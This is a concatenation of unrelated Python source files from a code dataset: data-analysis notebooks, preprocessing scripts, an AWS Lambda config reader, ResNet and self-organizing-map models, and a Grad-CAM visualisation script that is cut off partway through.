img2_canvas = w.create_image(width,0, image=img2, anchor="nw")
f = tkinter.Frame(height=50)
deformButton = tkinter.Button(f,text="Need to add points", state='disabled', command=deformPicture)
# progressBar.grid(row=0, column=1)
# progressBar.grid_remove()
# w.create_window(width*2, 0, window=deformButton, anchor="nw")
# Create points
current = None
new = []
original = []
arrows = []
# Coordinate indicator
coord = w.create_text(10, height)
w.itemconfigure(coord, text='0 0', anchor="sw")
# w.pack(expand="yes", fill="both")
top.geometry('{}x{}'.format(2*width, height+50))
# deformButton.pack()
deformButton.grid(row=0, column=0)
w.grid(row=1)
f.grid(row=0)
top.mainloop()
if __name__ == '__main__':
main()
| true |
a0774cf3007ab7bb3a7cea02e9dd6dd828266ae0 | Python | Hakkim-s/Learn_Data_Science | /Data Visualisation/Sample Excersice/Abul's Assignment.py | UTF-8 | 2,086 | 2.75 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# In[8]:
from statistics import mode
mode([5, 17, 23, 31, 43, 49, 57, 17, 57, 17])
# In[11]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[12]:
train_data=pd.read_csv("Standard Metropolitan Areas Data - train_data - data.csv")
# In[62]:
train_data1=pd.read_csv("Standard Metropolitan Areas Data - train_data - data.csv")
# In[63]:
train_data1
# In[64]:
train_data= train_data1
# In[65]:
train_data
# In[ ]:
# In[35]:
count=0
if train_data.region ==4:
count+=1
else:
pass
# In[61]:
train_data
# In[ ]:
# In[13]:
train_data.describe()
# In[34]:
mode(train_data.region)
# In[ ]:
# In[ ]:
# In[14]:
train_data.info()
# In[16]:
train_data.head()
# In[17]:
train_data.tail()
# In[22]:
train_data['hospital_beds'].isnull().sum()
# In[30]:
plt.scatter(train_data.crime_rate,train_data.region)
# In[32]:
x=train_data
plt.plot(x.land_area, x.crime_rate)
plt.show()
# In[68]:
train_data[(train_data['region'] ) & (train_data['land_area'] >= 5000)]
# In[ ]:
train_data['crime_rate'] >)
# In[ ]:
# In[73]:
train_data[(train_data['region'] >3)]
# In[79]:
qq=train_data[(train_data['region'] <=1)]
# In[80]:
qq
# In[81]:
qq[qq['crime_rate']>=54.16]
# In[84]:
plt.scatter(train_data.physicians,train_data.hospital_beds)
plt.title('Plot of hospital_beds,physicians') # Adding a title to the plot
plt.ylabel("hospital_beds") # Adding the label for the horizontal axis
plt.xlabel("physicians") # Adding the label for the vertical axis
plt.show()
# In[87]:
train_data['region'].value_counts().plot(kind='bar');
# In[89]:
plt.hist(train_data.income)
plt.show()
# In[91]:
train_data.corr()
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| true |
75fab5b118d37353f3c76a342d5bfa09bf3693a8 | Python | DeepHiveMind/Demo_Noflo_Data | /GraphPlot.py | UTF-8 | 247 | 2.859375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import sys
import io
data_string = sys.argv[1]
data = io.StringIO(data_string)
df = pd.read_csv(data, sep=",")
df.plot(kind='bar',x='quantity',y='unit price',color='red')
plt.show()
| true |
295b2cb3bc6311a369c2e1e5c8818fc9e67895a0 | Python | christophmeyer/longboard-pothole-detection | /pothole_model/preprocessing/preprocess_data.py | UTF-8 | 3,712 | 2.78125 | 3 | [
"MIT"
] | permissive | import argparse
import pandas as pd
import numpy as np
import os
from shutil import copyfile
from preprocessing.convert_images import read_grayscale
from sklearn.model_selection import train_test_split
from model.train import ModelConfig
def read_annotated_capture_data(input_dir):
"""
Loops over all capture directories in the input_dir and puts them together. Assumes there
to be a labels.csv. Only used the images that are in the labels.csv, ignores the others. Thus,
in order to remove images from the dataset, just delete the corresponding row in labels.csv.
"""
picture_filenames = []
labels_list = []
for capture_dir in os.listdir(input_dir):
annotated_labels = pd.read_csv(os.path.join(input_dir, capture_dir, 'labels.csv'), sep=';')
new_filenames = [os.path.join(capture_dir, filename)
for filename in annotated_labels['file'].tolist()]
picture_filenames += new_filenames
new_labels = np.zeros(len(new_filenames))
for id, label in enumerate(annotated_labels['label'].tolist()):
new_labels[id] = label
labels_list.append(new_labels)
labels = np.concatenate(labels_list)
return picture_filenames, labels
def save_data(input_dir, picture_filenames, labels, prefix, output_dir, augment=False):
"""
Saves the data for a given split (train/val/test) to the subdirectory prefix of the output_dir.
If augment=True, then also vertically flipped images are saved together with the correcponding
labels.
"""
print('Saving {} data to {}'.format(prefix, os.path.join(output_dir, prefix)))
out_subdir = os.path.join(output_dir, prefix, 'features')
if not os.path.exists(out_subdir):
os.makedirs(out_subdir)
if augment:
labels = np.concatenate([labels, labels])
np.savetxt(os.path.join(output_dir, prefix, 'labels.csv'), labels, delimiter=';')
idx = 0
for filename in picture_filenames:
copyfile(os.path.join(input_dir, filename), os.path.join(
out_subdir, '{}_{}.gs'.format(prefix, str(idx).zfill(6))))
idx += 1
if augment:
for filename in picture_filenames:
gs_img = read_grayscale(os.path.join(input_dir, filename), width=96)
np.flip(
gs_img, (1)).tofile(
os.path.join(out_subdir, '{}_{}.gs'.format(prefix, str(idx).zfill(6))))
idx += 1
def preprocess_data(config):
"""
Combines that data from all capture directories in the raw_data_dir, splits the data into
train, validation and test and augments the data by vertically flipping images. The resulting
data is saved into train, val, test subdirs of the train_data_dir.
"""
picture_filenames, labels = read_annotated_capture_data(config.raw_data_dir)
X_train_tmp, X_test, y_train_tmp, y_test = train_test_split(
picture_filenames, labels, test_size=config.test_split, random_state=1)
X_train, X_val, y_train, y_val = train_test_split(
X_train_tmp, y_train_tmp, test_size=config.validation_split, random_state=1)
save_data(config.raw_data_dir, X_train, y_train, 'train',
config.train_data_dir, config.augment_train_data)
save_data(config.raw_data_dir, X_val, y_val, 'val',
config.train_data_dir, config.augment_val_data)
save_data(config.raw_data_dir, X_test, y_test, 'test',
config.train_data_dir, config.augment_test_data)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--config_path')
args = parser.parse_args()
config = ModelConfig(config_path=args.config_path)
preprocess_data(config)
| true |
f287d1e1ac0cbc3a2d7367bc514c01cd18815c5b | Python | david30907d/soph | /demos/utils.py | UTF-8 | 2,785 | 3.125 | 3 | [
"MIT"
] | permissive | # coding: utf-8
import re
import jieba
import logging
from functools import partial
jieba.setLogLevel(logging.INFO)
PUNCTS_PATTERN = re.compile(ur"[.,;:!?'\"~\[\]\(\)\{\}_—。….,;、:!?‘’“”〕《》【】〖〗()「」~]")
SPACES_PATTERN = re.compile(ur"[\r\n\t\u00a0 ]")
SENT_SEP = u'。,!?~;:.,!?:;'
def encode_from_unicode(text):
"""将文本转换为 str 格式"""
return text.encode('utf-8') if isinstance(text, unicode) else text
def decode_to_unicode(text):
"""将文本转换为 unicode 格式"""
return text.decode('utf-8') if isinstance(text, str) else text
def to_halfwidth(text):
"""将文本中的全角字符转换为半角字符"""
text = decode_to_unicode(text)
res = u''
for uchar in text:
inside_code = ord(uchar)
if inside_code == 0x3000:
inside_code = 0x0020
else:
inside_code -= 0xfee0
if inside_code < 0x0020 or inside_code > 0x7e:
res += uchar
else:
res += unichr(inside_code)
return res
def remove_punctuations(text):
"""从文本中移除标点符号"""
text = decode_to_unicode(text)
return PUNCTS_PATTERN.sub(u' ', text)
def unify_whitespace(text):
"""统一文本中的空白字符为空格"""
text = decode_to_unicode(text)
return SPACES_PATTERN.sub(u' ', text)
def remove_redundant(text, chars):
"""将字符串中连续的指定字符压缩成一个"""
text = decode_to_unicode(text)
chars = decode_to_unicode(chars)
if chars == u'' or text == u'':
return text
char_set = set(chars)
prev = u''
result = u''
for ch in text:
if ch != prev or ch not in char_set:
result += ch
prev = ch
return result
def clean(text):
funcs = [
to_halfwidth,
remove_punctuations,
unify_whitespace,
partial(remove_redundant, chars=u' ')
]
cleaned_text = reduce(lambda x, fn: fn(x), [text] + funcs)
return cleaned_text
def words_tokenize(text):
"""分词"""
text = decode_to_unicode(text)
return [word.strip() for word in jieba.cut(text) if len(word.strip()) > 0]
def sents_tokenize(text, puncts=SENT_SEP):
"""分句"""
tokens = words_tokenize(text)
sents = []
prev = u' '
cur_sent = []
for tk in tokens:
if tk not in puncts and prev in puncts:
sents.append(cur_sent)
cur_sent = []
cur_sent.append(tk)
prev = tk
if cur_sent:
sents.append(cur_sent)
return sents
def shingle(sequence, length):
if len(sequence) < length:
return []
else:
return [sequence[i:i+length] for i in xrange(len(sequence) - length + 1)]
| true |
a944e0c837c86fa14101c4f98c07ad01b3905efd | Python | lucas-alcantara/perl_vs_python | /read_and_write.py | UTF-8 | 1,184 | 3.8125 | 4 | [] | no_license | # Read and Write Files Row by Row in Python
# Import os module for system function
import os
# Input file name
iris_in = "iris.csv"
# Output file name
iris_out = "iris.tsv"
# URL
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
# Download and save iris dataset
# -s Silent mode. Don't output anything
# -o Write output to <file> instead of stdout
os.system("curl %s -s -o %s" % (url, iris_in))
# open input file for reading (r) and stop (die) if you encounter an error
with open(iris_in, 'r') as fin:
# open output file for writing (w) and stop (die) if you encounter an error
with open(iris_out, 'w') as fout:
# read file one line at a time.
for line in fin:
# remove end of line character
line = line.rstrip()
# split line by commas and store fields in a list
fields = line.split(',')
# join fields by tabs and store them in a string
new_line = '\t'.join(fields)
# print new line in output file with end of line character as \n
fout.write(new_line + "\n")
# close input and output files
fin.close()
fout.close()
| true |
a19e78dd0821f6b1e0f4fa5a53cfc5d7f6533bc3 | Python | dougjaso/amazon-connect-snippets | /python/remote-control-center/GetConfigLambda/lambda_function.py | UTF-8 | 6,055 | 2.6875 | 3 | [
"MIT-0"
] | permissive | import boto3
import os
import time
from boto3.dynamodb.conditions import Key, Attr
'''
SAMPLE CONNECT INVOCATION EVENTS
Get a single Message with language code in attributes:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "es"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW",
"ConfigId": "MENU_OPTIONS"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"MENU_OPTIONS": "Presione 1 para hablar con un agente. Pulse 2 para escuchar nuestras últimas noticias."
}
Get a single Message with language code in attributes but OVERWRITTEN by parameters:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "es"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW",
"ConfigId": "MENU_OPTIONS"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"MENU_OPTIONS": "Appuyez sur 1 pour parler à un agent. Appuyez sur 2 pour connaître nos dernières nouvelles."
}
Get all messagees from a collection:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "en"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"EMERGENCY_MESSAGE": "We are currently closed due to company holiday.",
"GREETING": "Hello. Thank you for calling the Amazon Connect Command Center hotline",
"HOT_MESSAGE": "We're experiencing higher than normal hold times.",
"HOT_MESSAGE_FLAG": "2",
"LATEST_NEWS": "We are excited to launch the Amazon Connect Command Center solution",
"MENU_OPTIONS": "Press 1 to speak to an agent. Press 2 to hear our latest news.",
"NEXT_CONTACT_FLOW": "<CONTACT_FLOW_ID>",
"ROUTE_TO_AGENT_MESSAGE": "We will now route you to an agent."
}
'''
ddb = boto3.resource('dynamodb')
tb_name = os.environ['ConfigTable']
translate = boto3.client('translate')
primary_key = os.environ['TablePrimaryKey']
sort_key = os.environ['TableSortKey']
table = ddb.Table(tb_name)
def parse_parameters(params, attributes):
if "ConfigId" in params:
config_id = params["ConfigId"]
else:
config_id = None
if "CollectionId" in params:
collection_id = params["CollectionId"]
else:
collection_id = None
if "LanguageCode" in params:
language_code = params['LanguageCode']
elif "LanguageCode" in attributes:
language_code = attributes['LanguageCode']
else:
language_code = 'en'
return config_id, collection_id, language_code
def add_new_language(collection_id, config_id, message_text, language_code):
key = {
primary_key: collection_id,
sort_key: config_id
}
resp = table.update_item(
Key=key,
UpdateExpression="SET {} = :t".format(language_code),
ExpressionAttributeValues = {":t": message_text}
)
return
def translate_and_update(collection_id, config_id, message_text, language_code):
try:
if language_code == "en":
add_new_language(collection_id, config_id, message_text, language_code)
return message_text, 'en'
resp = translate.translate_text(
Text=message_text,
SourceLanguageCode='en',
TargetLanguageCode=language_code
)
translated_text = resp['TranslatedText']
add_new_language(collection_id, config_id, translated_text, language_code)
return translated_text, language_code
except:
return message_text, 'en'
def get_configs(collection_id, config_id=None):
configs = []
if config_id is None:
resp = table.query(
KeyConditionExpression=Key('CollectionId').eq(collection_id)
)
if "Items" in resp:
configs.extend(resp["Items"])
else:
key = {
primary_key: collection_id,
sort_key: config_id
}
resp = table.get_item(
Key=key
)
if "Item" in resp:
configs.append(resp["Item"])
return configs
def process_configs(collection_id, raw_configs, language_code):
response = {
"SUCCESS": "TRUE"
}
for conf in raw_configs:
config_id = conf["ConfigId"]
if conf["ConfigType"] == "STATIC_ROUTING":
response[config_id] = conf["DefaultResponse"]
elif conf["ConfigType"] == "LANGUAGE_ROUTING":
if language_code in conf:
response[config_id] = conf[language_code]
else:
add_new_language(collection_id, config_id, conf["DefaultResponse"], language_code)
response[config_id] = conf["DefaultResponse"]
elif conf["ConfigType"] == "MESSAGE":
if language_code in conf:
response[config_id] = conf[language_code]
else:
response_text, language_code = translate_and_update(collection_id, config_id, conf['DefaultResponse'], language_code)
response[config_id] = response_text
return response
def default_response():
return {
"SUCCESS": "FALSE"
}
def lambda_handler(event, context):
try:
config_id, collection_id, language_code = parse_parameters(event["Details"]["Parameters"], event["Details"]["ContactData"]["Attributes"])
if config_id is None and collection_id is None:
return default_response()
raw_configs = get_configs(collection_id, config_id)
if len(raw_configs) == 0:
return default_response()
return process_configs(collection_id, raw_configs, language_code)
except Exception as e:
print(e)
return default_response()
| true |
d59983e808d95f795d7eea3c1bda105d6472032a | Python | sripathisridhar/acav100m | /evaluation/code/models/video_model_builder.py | UTF-8 | 8,544 | 2.515625 | 3 | [
"MIT"
] | permissive | """Visual Conv models."""
import torch
import torch.nn as nn
import math
from models import head_helper, resnet_helper, stem_helper
from models.build import MODEL_REGISTRY
# Number of blocks for different stages given the model depth.
_MODEL_STAGE_DEPTH = {18: (2, 2, 2, 2), 34: (3, 4, 6, 3), 50: (3, 4, 6, 3), 101: (3, 4, 23, 3)}
# Basis of temporal kernel sizes for each of the stage.
_TEMPORAL_KERNEL_BASIS = {
"resnet": [
[[5]], # conv1 temporal kernel.
[[1]], # res2 temporal kernel.
[[1]], # res3 temporal kernel.
[[3]], # res4 temporal kernel.
[[3]], # res5 temporal kernel.
],
}
_POOL1 = {
"resnet": [[1, 1, 1]],
}
@MODEL_REGISTRY.register()
class ResNet(nn.Module):
"""
ResNet model builder. It builds a ResNet like network backbone.
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(ResNet, self).__init__()
self.num_pathways = 1
self._construct_network(cfg)
def _compute_dim_in(
self,
idx,
trans_func,
width_per_group,
):
"""
Compute the input dimension of each convolutional stage.
args:
idx (int): the index of the convolutional stage.
trans_func (string): transform function to be used to contrusct each
ResBlock.
width_per_group (int): width of each group.
returns:
dim_in (list): list containing the input dimension.
"""
if trans_func == 'basic_transform':
factor = 1 if idx == 0 else 2 ** (idx - 1)
elif trans_func == 'bottleneck_transform':
factor = 1 if idx == 0 else 2 * (2 ** idx)
else:
raise NotImplementedError(
"Does not support {} transfomration".format(trans_func)
)
dim_in = [width_per_group * factor]
return dim_in
def _compute_dim_out(
self,
idx,
trans_func,
width_per_group,
):
"""
Compute the output dimension of each convolutional stage.
args:
idx (int): the index of the convolutional stage.
trans_func (string): transform function to be used to contrusct each
ResBlock.
width_per_group (int): width of each group.
returns:
dim_out (list): list containing the output dimension.
"""
if trans_func == 'basic_transform':
factor = 2 ** idx
elif trans_func == 'bottleneck_transform':
factor = 4 * (2 ** idx)
else:
raise NotImplementedError(
"Does not support {} transfomration".format(trans_func)
)
dim_out = [width_per_group * factor]
return dim_out
def _construct_network(self, cfg):
"""
Builds a ResNet model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.VIS.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.VIS.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
(d2, d3, d4, d5) = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.VIS.ARCH]
self.s1 = stem_helper.VideoModelStem(
dim_in=cfg.DATA.INPUT_CHANNEL_NUM,
dim_out=[width_per_group],
kernel=[temp_kernel[0][0] + [7, 7]],
stride=[[2, 2, 2]],
padding=[[temp_kernel[0][0][0] // 2, 3, 3]],
eps=cfg.MODEL.EPSILON,
bn_mmt=cfg.MODEL.MOMENTUM,
)
dim_in_l = [
self._compute_dim_in(
i,
cfg.RESNET.TRANS_FUNC,
width_per_group
)
for i in range(4)
]
dim_out_l = [
self._compute_dim_out(
i,
cfg.RESNET.TRANS_FUNC,
width_per_group
)
for i in range(4)
]
self.s2 = resnet_helper.ResStage(
dim_in=dim_in_l[0],
dim_out=dim_out_l[0],
dim_inner=[dim_inner],
temp_kernel_sizes=temp_kernel[1],
stride=cfg.RESNET.SPATIAL_STRIDES[0],
num_blocks=[d2],
num_groups=[num_groups],
num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0],
trans_func_name=cfg.RESNET.TRANS_FUNC,
stride_1x1=cfg.RESNET.STRIDE_1X1,
inplace_relu=cfg.RESNET.INPLACE_RELU,
dilation=cfg.RESNET.SPATIAL_DILATIONS[0],
eps=cfg.MODEL.EPSILON,
bn_mmt=cfg.MODEL.MOMENTUM,
)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(
kernel_size=pool_size[pathway],
stride=pool_size[pathway],
padding=[0, 0, 0],
)
self.add_module("pathway{}_pool".format(pathway), pool)
self.s3 = resnet_helper.ResStage(
dim_in=dim_in_l[1],
dim_out=dim_out_l[1],
dim_inner=[dim_inner * 2],
temp_kernel_sizes=temp_kernel[2],
stride=cfg.RESNET.SPATIAL_STRIDES[1],
num_blocks=[d3],
num_groups=[num_groups],
num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1],
trans_func_name=cfg.RESNET.TRANS_FUNC,
stride_1x1=cfg.RESNET.STRIDE_1X1,
inplace_relu=cfg.RESNET.INPLACE_RELU,
dilation=cfg.RESNET.SPATIAL_DILATIONS[1],
eps=cfg.MODEL.EPSILON,
bn_mmt=cfg.MODEL.MOMENTUM,
)
self.s4 = resnet_helper.ResStage(
dim_in=dim_in_l[2],
dim_out=dim_out_l[2],
dim_inner=[dim_inner * 4],
temp_kernel_sizes=temp_kernel[3],
stride=cfg.RESNET.SPATIAL_STRIDES[2],
num_blocks=[d4],
num_groups=[num_groups],
num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2],
trans_func_name=cfg.RESNET.TRANS_FUNC,
stride_1x1=cfg.RESNET.STRIDE_1X1,
inplace_relu=cfg.RESNET.INPLACE_RELU,
dilation=cfg.RESNET.SPATIAL_DILATIONS[2],
eps=cfg.MODEL.EPSILON,
bn_mmt=cfg.MODEL.MOMENTUM,
)
self.s5 = resnet_helper.ResStage(
dim_in=dim_in_l[3],
dim_out=dim_out_l[3],
dim_inner=[dim_inner * 8],
temp_kernel_sizes=temp_kernel[4],
stride=cfg.RESNET.SPATIAL_STRIDES[3],
num_blocks=[d5],
num_groups=[num_groups],
num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3],
trans_func_name=cfg.RESNET.TRANS_FUNC,
stride_1x1=cfg.RESNET.STRIDE_1X1,
inplace_relu=cfg.RESNET.INPLACE_RELU,
dilation=cfg.RESNET.SPATIAL_DILATIONS[3],
eps=cfg.MODEL.EPSILON,
bn_mmt=cfg.MODEL.MOMENTUM,
)
_num_frames = cfg.DATA.NUM_FRAMES // 2
self.head = head_helper.ResNetPoolingHead(
dim_in=dim_out_l[3],
pool_size=[
[
_num_frames // pool_size[0][0],
math.ceil(cfg.DATA.CROP_SIZE / 32) // pool_size[0][1],
math.ceil(cfg.DATA.CROP_SIZE / 32) // pool_size[0][2],
]
],
)
self.output_size = sum(dim_out_l[3])
def get_feature_map(self, x):
x = self.s1(x)
x = self.s2(x)
for pathway in range(self.num_pathways):
pool = getattr(self, "pathway{}_pool".format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s4(x)
x = self.s5(x)
return x
def get_logit(self, feature_map):
return self.head(feature_map)
def forward(self, x):
x = self.s1(x)
x = self.s2(x)
for pathway in range(self.num_pathways):
pool = getattr(self, "pathway{}_pool".format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s4(x)
x = self.s5(x)
x = self.head(x)
return x
| true |
616262c4788f287bdf469ff77461ef5dbcca0150 | Python | surajdidwania/Deep-Learning-Projects | /Self_Organizing_Maps/somdp.py | UTF-8 | 1,020 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#Importing the dataset
dataset = pd.read_csv('Credit_Card_Applications.csv')
X = dataset.iloc[:,:-1].values
y = dataset.iloc[:,-1].values
#Festure Scaling
from sklearn.preprocessing import StandardScaler,MinMaxScaler
sc= MinMaxScaler(feature_range = (0,1))
X = sc.fit_transform(X)
#Implementation of Self organising maps
som = MiniSom(10,10,15,sigma=1.0,learning_rate=0.5)
som.random_weights_init(X)
som.train_random(X,100)
#Visualiisng results
from pylab import bone,pcolor,colorbar,plot,show
bone()
pcolor(som.distance_map().T)
colorbar()
markers = ['o','s']
colors = ['r','g']
for i,x in enumerate(X):
w = som.winner(x)
plot(w[0]+0.5,w[1]+0.5,markers[y[i]],markeredgecolor = colors[y[i]],markerfacecolor = 'None',markersize = 10,markeredgewidth = 2)
show()
#Finding the frauds
mappings = som.win_map(X)
fraud = np.concatenate((mappings[(7,7)],mappings[(6,6)]),axis=0)
fraud = sc.inverse_transform(fraud) | true |
f51257a9a215d76c1640e21da4734ce9ce61b14c | Python | zhbngchen/USACO | /contest/herding.py | UTF-8 | 459 | 2.96875 | 3 | [] | no_license | fin = open("herding.in", 'r')
fout = open("herding.out", 'w')
a, b, c = map(int, fin.readline().split())
distAB = b - a
distBC = c - b
if distAB == 1 and distBC ==1:
best = 0
worst = 0
else:
if distAB == 2 or distBC == 2:
best = 1
else:
best = 2
if distAB < distBC:
maxDist = distBC
else:
maxDist = distAB
worst = maxDist - 1
fout.write(str(best) + '\n')
fout.write(str(worst) + '\n')
fout.close()
| true |
541f2f0e47018eb50e9dbb0308c86312252dc465 | Python | trevbhatt/bengali | /grad-cam.py | UTF-8 | 13,684 | 2.640625 | 3 | [] | no_license | '''Command to run:
python grad-cam.py --image-path 'sample_4.pickle' --use-cuda --model 'storage/models/consonant_diacritic.pth' --label 'label_4_vowel.pickle'
'''
import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
import torch.nn as nn
import torch.nn.functional as F
import pickle
class FeatureExtractor():
""" Class for extracting activations and
registering gradients from targetted intermediate layers """
def __init__(self, model, target_layers):
self.model = model
self.target_layers = target_layers
self.gradients = []
def save_gradient(self, grad):
self.gradients.append(grad)
def __call__(self, x):
outputs = []
self.gradients = []
for name, module in self.model._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class ModelOutputs():
""" Class for making a forward pass, and getting:
1. The network output.
2. Activations from intermeddiate targetted layers.
3. Gradients from intermeddiate targetted layers. """
def __init__(self, model, target_layers):
self.model = model
self.feature_extractor = FeatureExtractor(self.model, target_layers)
def get_gradients(self):
return self.feature_extractor.gradients
def __call__(self, x):
target_activations, output = self.feature_extractor(x)
# output = output.view(output.size(0), -1)
# output = self.model.fc3(output) # changed from model.classifier
return target_activations, output
def preprocess_image(img):
means = [0.485, 0.456, 0.406]
stds = [0.229, 0.224, 0.225]
preprocessed_img = img.copy()[:, :, ::-1]
for i in range(3):
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] - means[i]
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] / stds[i]
preprocessed_img = \
np.ascontiguousarray(np.transpose(preprocessed_img, (2, 0, 1)))
preprocessed_img = torch.from_numpy(preprocessed_img)
preprocessed_img.unsqueeze_(0)
input = preprocessed_img.requires_grad_(True)
return input
def show_cam_on_image(img, mask, pred_index, prefix):
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
cv2.imwrite(f"{prefix}_{pred_index}_cam.jpg", np.uint8(255 * cam))
class GradCam:
def __init__(self, model, target_layer_names, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
self.extractor = ModelOutputs(self.model, target_layer_names)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
features, output = self.extractor(input.cuda())
else:
features, output = self.extractor(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.classifier.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
target = features[-1]
target = target.cpu().data.numpy()[0, :]
weights = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.zeros(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, (136, 136)) # changed from (224, 224)
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam, index
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input):
positive_mask = (input > 0).type_as(input)
output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
self.save_for_backward(input, output)
return output
@staticmethod
def backward(self, grad_output):
input, output = self.saved_tensors
grad_input = None
positive_mask_1 = (input > 0).type_as(grad_output)
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
positive_mask_1), positive_mask_2)
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
# replace ReLU with GuidedBackpropReLU
for idx, module in self.model._modules.items():
if module.__class__.__name__ == 'ReLU':
self.model._modules[idx] = GuidedBackpropReLU.apply
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
output = self.forward(input.cuda())
else:
output = self.forward(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.classifier.zero_grad()
one_hot.backward(retain_graph=True)
output = input.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--use-cuda', action='store_true', default=False,
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
parser.add_argument('--model', type=str)
parser.add_argument('--label', type=str)
parser.add_argument('--prefix', type=str)
args = parser.parse_args()
args.use_cuda = args.use_cuda and torch.cuda.is_available()
if args.use_cuda:
print("Using GPU for acceleration")
else:
print("Using CPU for computation")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img*255)
# Define a flatten class to be picked up by the
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# Define the Parameters for the neural network
# see if neutron can help visualize my network
# Look at fast ai tutorials for CNN
# Convolution layer 1
self.conv1_input_channels = 1
self.conv1_kernel_size = 9
self.conv1_stride = 1
self.conv1_output_channels = 16
self.conv1_output_dim = output_size(img_resize,
self.conv1_kernel_size,
self.conv1_stride)
# Pooling layer 1
self.pool1_kernel_size = 11
self.pool1_stride = 2
self.pool1_output_dim = output_size(self.conv1_output_dim,
self.pool1_kernel_size,
self.pool1_stride)
#conv 2
self.conv2_input_channels = self.conv1_output_channels
self.conv2_kernel_size = 8
self.conv2_stride = 1
self.conv2_output_channels = 32
self.conv2_output_dim = output_size(self.pool1_output_dim,
self.conv2_kernel_size,
self.conv2_stride)
# Pooling layer 2
self.pool2_kernel_size = 8
self.pool2_stride = 2
self.pool2_output_dim = output_size(self.conv2_output_dim,
self.pool2_kernel_size,
self.pool2_stride)
